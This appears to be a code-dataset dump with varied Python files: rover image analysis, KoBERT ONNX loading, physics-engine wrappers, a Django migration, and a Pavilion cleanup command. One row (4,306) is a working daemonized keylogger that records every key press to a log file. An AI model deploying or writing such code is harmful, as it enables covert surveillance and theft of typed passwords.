index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
4,300 | 7d3264e9a90ebd72439f77983cbf4f9755048a85 | import requests,cv2,numpy,time,imutils
class imageAnalyzer():
    """Fetches camera frames from a rover's HTTP API and detects yellow
    "duckie" targets via HSV thresholding.

    Produces bounding boxes plus rough distance estimates, and writes
    temp<n>.jpeg / vis<n>.jpg debug images along the way.
    """

    def __init__(self,
                 roverName="Rover03",
                 url="http://192.168.1.10:5000/api/",
                 temp_img_path="./temp",
                 ):
        self.url = url + roverName
        self.temp_img_path = temp_img_path

    def getImage(self, img_number):
        """Download the current camera frame and save it as temp<img_number>.jpeg."""
        img = requests.get(self.url + "/image")
        # 'with' guarantees the file is closed even if the write fails.
        with open(self.temp_img_path + str(img_number) + ".jpeg", "wb") as temp:
            temp.write(img.content)

    def analyzeHSV(self, img_number, thresholds=None):
        """Load temp<img_number>.jpeg and build a binary mask of pixels inside
        the (min, max) HSV thresholds.

        :param thresholds: (min_hsv, max_hsv) numpy arrays; defaults to a
            yellow range. (Default built inside the body to avoid a shared
            mutable default argument.)
        :returns: (mask, original_image) tuple.
        """
        if thresholds is None:
            thresholds = (numpy.array([20, 100, 110]), numpy.array([40, 255, 255]))
        img = cv2.imread(self.temp_img_path + str(img_number) + ".jpeg")
        orig = numpy.copy(img)
        try:
            img = cv2.GaussianBlur(img, (7, 7), 8)
        except cv2.error:
            # Blur is best-effort noise reduction; fall back to the raw image.
            pass
        hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
        mask = cv2.inRange(hsv, thresholds[0], thresholds[1])
        return mask, orig

    def findBoundingBoxes(self, img, orig=None, area_thresh=100,
                          aspect_thresh=(0.8, 1.0), y_threshold=(0, 0.6)):
        """Find contours in the mask and return their bounding boxes, vetoed
        by minimum area, aspect ratio and vertical screen position.

        :param orig: optional BGR image to annotate; when given, contours and
            accepted boxes are drawn onto it and saved as vis0.jpg.
        """
        con = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
        con = imutils.grab_contours(con)
        # Fix: the old 'if orig.any()' crashed with AttributeError when the
        # default orig=None was used.
        if orig is not None:
            cv2.drawContours(orig, con, -1, (255, 255, 255), thickness=2)
        bound = [cv2.boundingRect(c) for c in con]
        # Veto on minimal bounding-box area, aspect ratio (h/w) and the box's
        # relative vertical position (480 px assumed camera height).
        bound = [b for b in bound
                 if b[2] * b[3] >= area_thresh
                 and aspect_thresh[0] <= b[3] / b[2] <= aspect_thresh[1]
                 and 480 * y_threshold[0] <= 480 - b[1] <= 480 * y_threshold[1]]
        if orig is not None:
            for b in bound:
                cv2.rectangle(orig, b, color=(0, 0, 255), thickness=2)
            # NOTE(review): always writes vis0.jpg regardless of which temp
            # image was analyzed -- confirm whether a per-image name is wanted.
            cv2.imwrite("vis{}.jpg".format(0), orig)
        return bound

    def approx_distance(self, duckie_boxes, dist_half_screen=5, camera_y_res=480):
        """Estimate the distance (cm) to each duck from its box height.

        Calibration: dist_half_screen is the camera-to-duck distance at which
        a duck fills half the image height (duck size assumed constant).
        NOTE: the Y coordinate origin is the top of the image and y_size
        grows downwards.

        :returns: list of ((x, y, w, h), distance_cm) tuples.
        """
        # Fix: the old version first built a dict keyed by box and then threw
        # it away by rebuilding the result as a list; only the list survives.
        return [(box, round(dist_half_screen * (1 / 2) * (camera_y_res / box[3])))
                for box in duckie_boxes]

    def capture(self, temp_image=0, db_file="temp_duck_boxes.txt"):
        """Grab one frame, detect ducks, persist distances to db_file.

        Creates temp<n>.jpeg and vis0.jpg with n = temp_image.
        :returns: (boxes, distances) per approx_distance's NOTE.
        """
        self.getImage(temp_image)
        mask, orig = self.analyzeHSV(temp_image)
        boxes = self.findBoundingBoxes(mask, orig)
        # Fix: used the module-level 'analyzer' global instead of self, which
        # broke any instance other than the script-level singleton.
        dist = self.approx_distance(boxes)
        with open(db_file, "w") as duck_box_file:
            duck_box_file.write(str(dist))
        return boxes, dist
# Module-level driver: poll the rover camera forever, refreshing duck
# detections twice a second. NOTE(review): this loop never terminates and
# overwrites temp0.jpeg / vis0.jpg / temp_duck_boxes.txt on every pass.
analyzer = imageAnalyzer()
while True:
    boxes, dist = analyzer.capture()
    time.sleep(0.5)
|
4,301 | b6e4214ace89165f6cfde9f2b97fcee8be81f2ed | # coding=utf-8
# Copyright 2019 SK T-Brain Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from kobert import download
def get_onnx_kobert_model(cachedir=".cache"):
    """Get KoBERT ONNX file path after downloading.

    Downloads the model into *cachedir* (or reuses a cached copy) and
    returns the local file path.
    """
    onnx_kobert = {
        "url": "s3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx",
        "chksum": "6f6610f2e3b61da6de8dbce",
    }
    # download() verifies the checksum; the second return value (whether the
    # file came from cache) is not needed here.
    model_path, _is_cached = download(
        onnx_kobert["url"], onnx_kobert["chksum"], cachedir=cachedir
    )
    return model_path
def make_dummy_input(max_seq_len):
    """Build fixed dummy (input_ids, token_type_ids, input_mask, position_ids)
    batches of two sequences, each right-padded to *max_seq_len*."""

    def _pad(rows, pad_id):
        # Right-pad every row with pad_id up to max_seq_len.
        return [row + [pad_id] * (max_seq_len - len(row)) for row in rows]

    input_ids = _pad([[31, 51, 99], [15, 5]], pad_id=1)
    token_type_ids = _pad([[0, 0, 0], [0, 0]], pad_id=0)
    input_mask = _pad([[1, 1, 1], [1, 1]], pad_id=0)
    position_ids = list(range(max_seq_len))
    return (input_ids, token_type_ids, input_mask, position_ids)
if __name__ == "__main__":
    # Smoke test: download the ONNX model and run one forward pass on the
    # fixed dummy batch.
    import onnxruntime
    import numpy as np
    from kobert import get_onnx_kobert_model

    onnx_path = get_onnx_kobert_model()
    dummy_input = make_dummy_input(max_seq_len=512)
    # NOTE(review): 'so' is created but never passed to InferenceSession --
    # confirm whether session options were meant to apply.
    so = onnxruntime.SessionOptions()
    sess = onnxruntime.InferenceSession(onnx_path)
    outputs = sess.run(
        None,
        {
            "input_ids": np.array(dummy_input[0]),
            "token_type_ids": np.array(dummy_input[1]),
            "input_mask": np.array(dummy_input[2]),
            "position_ids": np.array(dummy_input[3]),
        },
    )
    # Print the first row of the second-to-last model output.
    print(outputs[-2][0])
|
4,302 | d0e5cfc7b619c2eaec19248619d7d59e41503c89 | a=[i for i in range(10)]
# Python 2 demo exercising 'del' on list indices, slices and whole lists.
# (Uses py2 print statements -- do not run under Python 3.)
del a[0]        # drop first element -> [1..9]
print a
del a[-1]       # drop last element -> [1..8]
print a
del a[1]        # drop by positive index -> [1,3,4,..,8]
print a
del a[0:2]      # drop a slice
print a
del a[1:3:1]    # drop an extended slice (step 1)
print a
#test del all
del a[:]        # clear the list in place
print a
a.append(1)     # list object still usable after clearing
print a
# Make sure that del's work correctly in sub-scopes:
x = 1
def f1():
    # Shadows the module-level x; in py2, range() returns a real list.
    x = range(5)
    def f2():
        # Deleting an ITEM of the closed-over list (not the name itself).
        del x[1]
    return f2
f1()()
|
4,303 | 90d792fe18e589a0d74d36797b46c6ac1d7946be | # The purpose of this module is essentially to subclass the basic SWIG generated
# pynewton classes and add a bit of functionality to them (mostly callback related
# stuff). This could be done in the SWIG interface file, but it's easier to do it
# here since it makes adding python-specific extensions to newton easier.
import pynewton
# Probe for PyOpenGL once at import time; the drawing helpers check
# GLPresent before touching GL. Catch Exception (not bare except) so
# KeyboardInterrupt/SystemExit still propagate during import.
try:
    import OpenGL.GL as GL
    import OpenGL.GLU as GLU
    GLPresent = True
except Exception:
    GLPresent = False
def GetEulerAngle ( matrix ):
    """Thin pass-through to pynewton's matrix -> Euler-angle conversion."""
    return pynewton.GetEulerAngle( matrix )

def SetEulerAngle ( angle ):
    """Thin pass-through to pynewton's Euler-angle -> matrix conversion."""
    return pynewton.SetEulerAngle( angle )

#extensions to body
# Default no-op callbacks: safe placeholders matching the signatures the
# engine invokes, for users who only need a subset of the callbacks.
def NullApplyForceAndTorqueCallback( body ) :
    pass

def NullTransformCallback( body, matrix ):
    pass

def NullAutoactiveCallback( body, state ):
    pass

def NullBodyDestructCallback( body ):
    pass
class Body( pynewton.Body ):
    """Python-side wrapper over the SWIG Body that routes the engine's C
    callbacks to user-supplied Python functions and registers itself with
    its World for pointer -> object lookups."""

    def __init__( self, world, cg ):
        # Callback slots default to None; the On* hooks check before calling.
        self.ApplyForceAndTorqueCallback = None
        self.TransformCallback = None
        self.AutoactiveCallback = None
        self.DestructorCallback = None
        self.TreeCollisionCallback = None
        pynewton.Body.__init__( self, world, cg )
        world.RegisterBody( self )
        # Keep the collision geometry alive and retrievable from Python.
        self.py_cg = cg

    def SetApplyForceAndTorqueCallback( self, callback ):
        """Set callback(body) invoked each step to apply forces/torques."""
        self.ApplyForceAndTorqueCallback = callback

    def SetAutoactiveCallback( self, callback ):
        """Set callback(body, state) invoked on activation state changes."""
        self.AutoactiveCallback = callback

    def GetCollision( self ):
        """Return the Python-side collision geometry passed to __init__."""
        return self.py_cg

    def OnApplyForceAndTorque(self):
        if self.ApplyForceAndTorqueCallback is not None:
            self.ApplyForceAndTorqueCallback( self )

    def OnAutoactive(self, state ):
        if self.AutoactiveCallback is not None:
            self.AutoactiveCallback( self, state )

    def OnTransform( self ):
        matrix = self.GetMatrix()
        if self.TransformCallback is not None:
            self.TransformCallback( self, matrix )

    def OnDestruct( self ):
        # Fix: the old code passed an undefined local 'matrix' here, which
        # raised NameError whenever a destructor callback was installed.
        # The callback contract (see NullBodyDestructCallback) takes (body).
        if self.DestructorCallback is not None:
            self.DestructorCallback( self )

    def OnTreeCollisionWith( self, body ):
        if self.TreeCollisionCallback is not None:
            self.TreeCollisionCallback(body)

    def Draw( self ):
        """Render this body's collision geometry at its current transform."""
        m = self.GetMatrix()
        # Fix: string exceptions ('raise "..."') are invalid in Python 3.
        if not GLPresent:
            raise RuntimeError("OpenGL module not loaded, cannot draw")
        GL.glPushMatrix()
        GL.glMultMatrixf( m )
        c = self.GetCollision()
        c.draw()
        GL.glPopMatrix()
class _materialCallback( object ):
def __init__(self, id1, id2, begin_function, process_function, end_function, userobject):
self.id1 = id1
self.id2 = id2
self.beginCallback = begin_function
self.processCallback = process_function
self.endCallback = end_function
self.userobject = userobject
#extensions to world
class World( pynewton.World ):
    """World wrapper tracking Python Body objects so that raw engine body
    pointers can be mapped back to their Python wrappers, and dispatching
    material-pair and raycast callbacks."""

    def __init__(self ):
        self.bodyList = []
        # Maps body.IDKey() -> Body wrapper (see RegisterBody).
        self.newtonBodyLookup = {}
        self.materialCallbacks = {}
        self.currentCallback = None
        self.raycastUserData = None
        self.raycastCallback = None
        pynewton.World.__init__(self)

    def RegisterBody( self, body ):
        """Track a Body wrapper; called from Body.__init__."""
        self.bodyList.append( body )
        self.newtonBodyLookup[body.IDKey()] = body

    def UnregisterBody( self, body ):
        """Stop tracking a Body wrapper."""
        # Fix: was 'self.bodyList.remove(bodyList.index(body))' which both
        # referenced an undefined global and tried to remove an index value.
        self.bodyList.remove( body )
        # Fix: registration keys the lookup by IDKey(), so removal must too
        # (was 'body.m_body').
        del self.newtonBodyLookup[body.IDKey()]

    def NewtonBodyToBody( self, ptr ):
        """Map a raw engine body pointer back to its Python wrapper."""
        return self.newtonBodyLookup[int(ptr)]

    def ForEachBodyDo( self, function ):
        """Apply function(body) to every registered body."""
        for body in self.bodyList:
            function( body )

    def RayCast( self, p0, p1, callback, userdata):
        """Casts a ray in the world defined by p0 and p1 and calls callback
        with the body, normal, collision id, user data and intersection distance"""
        self.raycastUserData = userdata
        self.raycastCallback = callback
        self.CppRayCast(p0[0], p0[1], p0[2], p1[0], p1[1], p1[2])

    def RayCastCallback( self, body, nx, ny, nz, collisionID, intersectParam ):
        #delegate this off to the user specified function
        return self.raycastCallback( body, (nx, ny, nz), collisionID,
                                     self.raycastUserData, intersectParam )

    def MaterialSetCollisionCallback( self, id1, id2, userdata=None,
                                      begin_func=None, process_func=None,
                                      end_func=None ):
        """Register per-material-pair contact callbacks with the engine."""
        self.materialCallbacks[(id1, id2)] = _materialCallback(
            id1, id2, begin_func, process_func, end_func, userdata)
        self.RegisterMaterialCallbackBetween( id1, id2)

    def GetMaterialCallback(self, material, body1, body2):
        """Look up the callback record for the two bodies' material pair."""
        id1 = body1.MaterialGroupID()
        id2 = body2.MaterialGroupID()
        return self.materialCallbacks[(id1, id2)]

    def MaterialBeginCollision( self, material, b1, b2 ):
        body1 = self.newtonBodyLookup[int(b1)]
        body2 = self.newtonBodyLookup[int(b2)]
        # Remember the pair's record so Process/End below can reuse it.
        self.currentCallback = self.GetMaterialCallback( material, body1, body2 )
        if self.currentCallback.beginCallback:
            self.currentCallback.beginCallback(material,
                                               body1,
                                               body2,
                                               self.currentCallback.userobject )

    def MaterialProcessCollision( self, material, contactHandle ):
        if self.currentCallback.processCallback:
            self.currentCallback.processCallback(material,
                                                 contactHandle,
                                                 self.currentCallback.userobject )

    def MaterialEndCollision( self, material ):
        if self.currentCallback.endCallback:
            self.currentCallback.endCallback( material,
                                              self.currentCallback.userobject )
#collision extensions
class CollisionGeometry( pynewton.CollisionGeometry ):
    """Base class for drawable collision shapes; subclasses override draw()."""
    def draw(self):
        # Fix: 'GlPresent' was a NameError typo for GLPresent, and string
        # exceptions are invalid in Python 3.
        if not GLPresent:
            raise RuntimeError("OpenGL module could not be loaded")
class Sphere ( pynewton.Sphere ):
    """Ellipsoid collision shape that can draw itself as a GLU wire sphere
    scaled to (w, h, d)."""

    def __init__(self, world, w, h, d, offset_matrix=None):
        pynewton.Sphere.__init__( self, world, w, h, d, offset_matrix )
        self.width = w
        self.height = h
        self.depth = d
        # The GLU quadric is only needed (and only creatable) when GL loaded.
        if GLPresent:
            self.quad = GLU.gluNewQuadric()

    def draw(self):
        # Fix: string exceptions ('raise "..."') are invalid in Python 3.
        if not GLPresent:
            raise RuntimeError("OpenGL module could not be loaded")
        GL.glPushMatrix()
        GL.glScalef( self.width, self.height, self.depth )
        # Draw as wireframe, then restore fill mode.
        GL.glPolygonMode( GL.GL_FRONT_AND_BACK, GL.GL_LINE )
        GLU.gluSphere( self.quad, 1.0, 12, 12 )
        GL.glPolygonMode( GL.GL_FRONT_AND_BACK, GL.GL_FILL )
        GL.glPopMatrix()
# Thin 1:1 wrappers over the SWIG collision primitives. They exist so user
# code can subclass and extend them on the Python side without touching the
# generated bindings; none add behavior yet.
class Box ( pynewton.Box ):
    pass

class Cone ( pynewton.Cone ):
    pass

class Cylinder (pynewton.Cylinder):
    pass

class ChamferCylinder (pynewton.ChamferCylinder):
    pass

class ConvexHull (pynewton.ConvexHull):
    pass

class ConvexHullModifier (pynewton.ConvexHullModifier):
    pass

class NullCollider (pynewton.NullCollider ):
    pass

class TreeCollision (pynewton.TreeCollision):
    pass
class TreeCollisionUserCallback ( pynewton.TreeCollisionUserCallback ):
    """Adapter forwarding the engine's tree-collision callback to a plain
    Python function with the same argument list."""

    def __init__( self, func ):
        # NOTE(review): the SWIG base-class __init__ is never invoked here --
        # confirm whether pynewton.TreeCollisionUserCallback requires it.
        self.callbackFunc = func

    def OnCallback (self, bodyWithTreeCollision, body, vertices, vertexstrideInBytes, indexCount, indexArray):
        # Silently do nothing when no function was supplied.
        if self.callbackFunc != None:
            self.callbackFunc( bodyWithTreeCollision, body, vertices, vertexstrideInBytes, indexCount, indexArray)
        pass
#material extensions
# Placeholder wrapper so material objects can be extended Python-side later.
class Material ( pynewton.Material ):
    pass
#joint extensions
class BallJoint ( pynewton.BallJoint ):
    """Ball-and-socket joint with an optional user callback fired by the
    engine's joint update."""

    def __init__(self, *args, **kwargs):
        self.callback = None
        pynewton.BallJoint.__init__(self, *args, **kwargs)

    def OnCallback(self):
        # Fix: the method was missing 'self', so the engine's dispatch would
        # raise TypeError and the body could never reference self.callback.
        if self.callback is not None:
            self.callback()
class Hinge ( pynewton.Hinge ):
    """Hinge joint with an optional user callback; the callback's return
    value is handed back to the engine (0 when unset)."""

    def __init__(self, *args, **kwargs):
        self.callback = None
        # Fix: the base __init__ was called without 'self'
        # ('pynewton.Hinge.__init__(*args, **kwargs)'), which misbound every
        # argument and never initialized this instance.
        pynewton.Hinge.__init__(self, *args, **kwargs)

    def OnCallback(self, desc):
        # Fix: was missing 'self' in the signature.
        if self.callback is not None:
            return self.callback(desc)
        return 0
class Slider ( pynewton.Slider ):
    """Slider joint wrapper.

    NOTE(review): unlike the other joints this one deliberately defines no
    OnCallback override (a commented-out draft was removed); self.callback is
    kept so the interface matches its siblings.
    """

    def __init__( self, *args, **kwargs ):
        self.callback = None
        pynewton.Slider.__init__( self, *args, **kwargs )
class Corkscrew ( pynewton.Corkscrew ):
    """Corkscrew joint with an optional user callback returning a value to
    the engine (0 when unset)."""

    def __init__(self, *args, **kwargs ):
        self.callback = None
        pynewton.Corkscrew.__init__(self, *args, **kwargs )

    def OnCallback(self, desc):
        # Fix: was missing 'self' in the signature, so self.callback raised
        # NameError whenever the engine invoked the hook.
        if self.callback is not None:
            return self.callback(desc)
        return 0
class UniversalJoint ( pynewton.UniversalJoint ):
    """Universal joint with an optional user callback returning a value to
    the engine (0 when unset)."""

    def __init__(self, *args, **kwargs ):
        self.callback = None
        pynewton.UniversalJoint.__init__( self, *args, **kwargs )

    def OnCallback(self, desc):
        # Fix: was missing 'self' in the signature.
        if self.callback is not None:
            return self.callback(desc)
        return 0
class UpVector ( pynewton.UpVector ):
    """Up-vector constraint with an optional no-argument user callback."""

    def __init__(self, *args, **kwargs ):
        self.callback = None
        pynewton.UpVector.__init__(self, *args, **kwargs )

    def OnCallback(self):
        # Fix: was missing 'self' in the signature.
        if self.callback is not None:
            self.callback()
# Placeholder wrapper for vehicle tires; extended Python-side when needed.
class Tire ( pynewton.Tire ):
    pass
class Vehicle ( pynewton.Vehicle ):
    """Vehicle wrapper tracking its Python-side tire list and an optional
    tire-update callback."""

    def __init__(self, *args, **kwargs ):
        self.tires = []
        self.UpdateTireCallback = None
        pynewton.Vehicle.__init__(self, *args, **kwargs )

    def AddTire ( self, matrix, pin, mass, width, radius, suspensionShock,
                  suspensionSpring, suspensionLength, userData, collisionID):
        """Create a tire in the engine, record it locally and return it."""
        tire = pynewton.Vehicle.AddTire(self, matrix, pin, mass, width,
                                        radius, suspensionShock,
                                        suspensionSpring, suspensionLength,
                                        userData, collisionID)
        # Fix: 'tires.append(tire)' referenced an undefined global instead of
        # the instance list initialized in __init__.
        self.tires.append( tire )
        return tire

    def RemoveTire( self, tire ):
        """Drop the tire from the local list and from the engine."""
        # Fix: 'del tires[tires.index(tire)]' referenced an undefined global.
        self.tires.remove( tire )
        pynewton.Vehicle.RemoveTire( self, tire )

    def OnCallback( self):
        if self.UpdateTireCallback is not None:
            self.UpdateTireCallback(self)
#Heightmap
# Placeholder wrapper for heightmap terrain collision.
class HeightField ( pynewton.HeightField ):
    pass
|
4,304 | a727502063bd0cd959fdde201832d37b29b4db70 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-10 11:06
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration: creates the Albumname model with
    many-to-many links to album.Shilpi (lineup) and album.Prokashok
    (prokashok). Do not hand-edit field definitions after it has been
    applied to a shared database."""

    dependencies = [
        ('album', '0013_auto_20160210_1609'),
    ]

    operations = [
        migrations.CreateModel(
            name='Albumname',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('album_text', models.CharField(blank=True, max_length=1000, null=True)),
                ('album_no', models.IntegerField(blank=True, null=True)),
                ('lineup', models.ManyToManyField(to='album.Shilpi')),
                ('prokashok', models.ManyToManyField(to='album.Prokashok')),
            ],
        ),
    ]
|
4,305 | 1ed7dba63db38e53a1dc5fac3c36f0dd98075c1f | from datetime import *
import datetime
import time
# Demo of the datetime / time modules: constructing times and dates,
# timedeltas, and wall-clock measurement.
time_one = datetime.time(1, 2, 3)
print("Time One :: ", time_one)
time_two = datetime.time(hour=23, minute=59, second=59, microsecond=99)
print("Time Two :: ", time_two)
# Keyword arguments may appear in any order.
date_one = datetime.date(month=3, year=2019, day=31)
print("Date One :: ", date_one)
today = datetime.date.today()
print("Today :: ", today, today.timetuple())
# NOTE(review): timedelta(x) interprets its first positional argument as
# DAYS, so this subtracts day-counts built from the two 'second' fields.
# Presumably timedelta(seconds=...) was intended -- confirm.
print("Difference Between Time :: ", timedelta(time_two.second) - timedelta(time_one.second))
print("Today :: ", datetime.date.today())
print("Time.asctime() :: ", time.asctime())
now = time.gmtime()   # current time as a UTC struct_time
print("time.asctime(time.gmtime) :: ", time.asctime(now))
# Measure elapsed wall-clock time around a 3-second sleep.
start = time.time()
time.sleep(3)
stop = time.time()
print(stop - start)
4,306 | 3dc2d9a5e37ce1f546c0478de5a0bb777238ad00 | from pynput.keyboard import Listener
import logging
import daemon
import socket
import thread
# Keystroke logger: records every key press to a file from a daemonized
# process. NOTE(review): this is surveillance-style code -- deploy only with
# explicit consent; the log path and lack of rotation are hard-coded.
logging.basicConfig(format="%(asctime)s:%(message)s")
file_logger = logging.FileHandler("/home/user0308/logger.log", "a")
logger = logging.getLogger()
logger.addHandler(file_logger)
logger.setLevel(logging.DEBUG)

def press(key):
    # Invoked by pynput for every key press; logs the key representation.
    logging.info(key)

def work():
    # Block forever inside the pynput listener loop.
    with Listener(on_press = press) as listener:
        listener.join()

# files_preserve keeps the log file descriptor open across daemonization
# (DaemonContext closes all other fds).
# NOTE(review): 'import thread' above is Python-2-only and is unused here --
# confirm the target interpreter.
with daemon.DaemonContext(files_preserve=[file_logger.stream.fileno()]):
    work()
|
4,307 | 18aafb71d7e6f5caa2f282126c31eb052c08ad3c | import errno
import os
import shutil
from calendar import monthrange
from datetime import datetime, timedelta
from pavilion import output
from pavilion import commands
from pavilion.status_file import STATES
from pavilion.test_run import TestRun, TestRunError, TestRunNotFoundError
class CleanCommand(commands.Command):
    """Cleans outdated test and series run directories."""

    def __init__(self):
        super().__init__(
            'clean',
            'Clean up Pavilion working directory.',
            short_help="Clean up Pavilion working directory."  # fix: typo "diretory"
        )

    def _setup_arguments(self, parser):
        """Register the clean command's CLI arguments."""
        parser.add_argument(
            '-v', '--verbose', action='store_true', default=False,
            help='Verbose output.'
        )
        parser.add_argument(
            '--older-than', nargs='+', action='store',
            help='Set the max age of files to be removed. Can be a date ex:'
            '"Jan 1 2019" or , or a number of days/weeks ex:"32 weeks"'
        )

    def run(self, pav_cfg, args):
        """Remove tests, series, downloads and builds older than the cutoff.

        :returns: 0 on success, errno.EINVAL when --older-than can't be
            parsed.
        """
        # Resolve --older-than into a concrete cutoff datetime. The value is
        # a token list, e.g. ['5', 'weeks'] or ['Jan', '1', '2019'].
        if args.older_than:
            if 'day' in args.older_than or 'days' in args.older_than:
                cutoff_date = datetime.today() - timedelta(
                    days=int(args.older_than[0]))
            elif 'week' in args.older_than or 'weeks' in args.older_than:
                cutoff_date = datetime.today() - timedelta(
                    weeks=int(args.older_than[0]))
            elif 'month' in args.older_than or 'months' in args.older_than:
                cutoff_date = get_month_delta(int(args.older_than[0]))
            else:
                date = ' '.join(args.older_than)
                try:
                    cutoff_date = datetime.strptime(date, '%b %d %Y')
                except (TypeError, ValueError):
                    output.fprint("{} is not a valid date."
                                  .format(args.older_than),
                                  file=self.errfile, color=output.RED)
                    return errno.EINVAL
        # No cutoff specified, removes everything.
        else:
            cutoff_date = datetime.today()

        tests_dir = pav_cfg.working_dir / 'test_runs'
        series_dir = pav_cfg.working_dir / 'series'
        download_dir = pav_cfg.working_dir / 'downloads'
        build_dir = pav_cfg.working_dir / 'builds'
        dependent_builds = []   # builds still referenced by surviving tests
        incomplete_tests = []   # tests kept (running/scheduled/too new)

        # Clean Tests
        output.fprint("Removing Tests...", file=self.outfile,
                      color=output.GREEN)
        for test in os.listdir(tests_dir.as_posix()):
            test_time = datetime.fromtimestamp(
                os.path.getmtime((tests_dir / test).as_posix()))
            try:
                test_obj = TestRun.load(pav_cfg, int(test))
                status = test_obj.status.current().state
            except (TestRunError, TestRunNotFoundError):
                output.fprint("Removing bad test directory {}".format(test),
                              file=self.outfile)
                # Fix: only remove THIS test's directory. The old code called
                # shutil.rmtree(tests_dir...), deleting the entire test_runs
                # tree on the first unloadable test.
                shutil.rmtree((tests_dir / test).as_posix())
                continue
            except PermissionError as err:
                err = str(err).split("'")
                output.fprint("Permission Error: {} cannot be removed"
                              .format(err[1]), file=self.errfile, color=31)
                # Fix: without this continue the code below referenced
                # 'status'/'test_obj', which are undefined on this path.
                continue
            if test_time < cutoff_date and status != STATES.RUNNING \
                    and status != STATES.SCHEDULED:
                shutil.rmtree((tests_dir / test).as_posix())
                if args.verbose:
                    output.fprint("Removed test {}".format(test),
                                  file=self.outfile)
            else:
                if args.verbose:
                    output.fprint("Skipped test {}".format(test),
                                  file=self.outfile)
                incomplete_tests.append(test)
                dependent_builds.append(test_obj.build_name)

        # Clean Series
        output.fprint("Removing Series...", file=self.outfile,
                      color=output.GREEN)
        for series in os.listdir(series_dir.as_posix()):
            # Fix: reset per series. Previously the flag was set once before
            # the loop, so one incomplete series blocked removal of every
            # series after it.
            completed_series = True
            try:
                series_time = datetime.fromtimestamp(
                    os.path.getmtime((series_dir / series).as_posix()))
                for test in incomplete_tests:
                    if os.path.exists((series_dir / series / test).as_posix()):
                        completed_series = False
                if series_time < cutoff_date and completed_series:
                    shutil.rmtree((series_dir / series).as_posix())
                    if args.verbose:
                        output.fprint("Removed series {}".format(series),
                                      file=self.outfile)
                else:
                    if args.verbose:
                        output.fprint("Skipped series {}".format(series),
                                      file=self.outfile)
            except PermissionError as err:
                err = str(err).split("'")
                output.fprint("Permission Error: {} cannot be removed"
                              .format(err[1]), file=self.errfile, color=31)

        # Clean Downloads
        output.fprint("Removing Downloads...", file=self.outfile,
                      color=output.GREEN)
        for download in os.listdir(download_dir.as_posix()):
            try:
                download_time = datetime.fromtimestamp(
                    os.path.getmtime((download_dir / download).as_posix()))
                if download_time < cutoff_date:
                    try:
                        shutil.rmtree((download_dir / download).as_posix())
                    except NotADirectoryError:
                        # Stray plain files in downloads/ are removed too.
                        output.fprint("{} is not a directory.".format(download),
                                      file=self.errfile, color=output.RED)
                        os.remove((download_dir / download).as_posix())
                    if args.verbose:
                        output.fprint("Removed download {}".format(download),
                                      file=self.outfile)
                else:
                    if args.verbose:
                        output.fprint("Skipped download {}".format(download),
                                      file=self.outfile)
            except PermissionError as err:
                err = str(err).split("'")
                output.fprint("Permission Error: {} cannot be removed"
                              .format(err[1]), file=self.errfile, color=31)

        # Clean Builds (skip builds still referenced by surviving tests).
        output.fprint("Removing Builds...", file=self.outfile,
                      color=output.GREEN)
        for build in os.listdir(build_dir.as_posix()):
            try:
                build_time = datetime.fromtimestamp(
                    os.path.getmtime((build_dir / build).as_posix()))
                if build_time < cutoff_date and build not in dependent_builds:
                    shutil.rmtree((build_dir / build).as_posix())
                    if args.verbose:
                        output.fprint("Removed build {}".format(build),
                                      file=self.outfile)
                else:
                    if args.verbose:
                        output.fprint("Skipped build {}".format(build),
                                      file=self.outfile)
            except PermissionError as err:
                err = str(err).split("'")
                output.fprint("Permission Error: {} cannot be removed. "
                              .format(err[1]), file=self.errfile, color=31)

        return 0
def get_month_delta(months):
    """Return the datetime *months* months before now.

    Keeps today's day-of-month and time-of-day; when the target month is
    shorter (e.g. Mar 31 -> February), the day is clamped to the month's
    last day.

    Fixes over the original: it passed the unbound method ``today.time``
    (not ``today.time()``) into ``datetime(...)``, raising TypeError, and
    its modulo arithmetic could produce month 0 (e.g. January minus 1).
    """
    today = datetime.today()
    # Work in a 0-based absolute month index so year wrap-around is exact.
    total_months = today.year * 12 + (today.month - 1) - months
    cut_year, cut_month0 = divmod(total_months, 12)
    cut_month = cut_month0 + 1
    try:
        cutoff_date = today.replace(year=cut_year, month=cut_month)
    except ValueError:
        # Target month has fewer days than today's day-of-month: clamp.
        last_day = monthrange(cut_year, cut_month)[1]
        cutoff_date = today.replace(year=cut_year, month=cut_month,
                                    day=last_day)
    return cutoff_date
|
4,308 | c9de51ee5a9955f36ecd9f5d92813821fb68fb3d | import argparse
import os
import shutil
import time, math
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
import numpy as np
import torch.utils.model_zoo as model_zoo
from torch.autograd.variable import Variable
from .Resnets import *
import torch.nn.functional as F
from torch.autograd import Variable
from efficientnet_pytorch import EfficientNet as efn
class ChannelAttention(nn.Module):
    """Channel attention (CBAM style): global avg- and max-pooled features
    pass through a shared bottleneck MLP (1x1 convs); the summed result is
    squashed with a sigmoid to per-channel weights in (0, 1)."""

    def __init__(self, in_planes, ratio=16):
        super(ChannelAttention, self).__init__()
        self.avg_pool = nn.AdaptiveAvgPool2d(1)
        self.max_pool = nn.AdaptiveMaxPool2d(1)
        # Fix: 'ratio' was accepted but the bottleneck width was hard-coded
        # to // 16; the parameter now actually controls it (default unchanged).
        self.fc = nn.Sequential(
            nn.Conv2d(in_planes, in_planes // ratio, 1, bias=False),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_planes // ratio, in_planes, 1, bias=False))
        self.sigmoid = nn.Sigmoid()

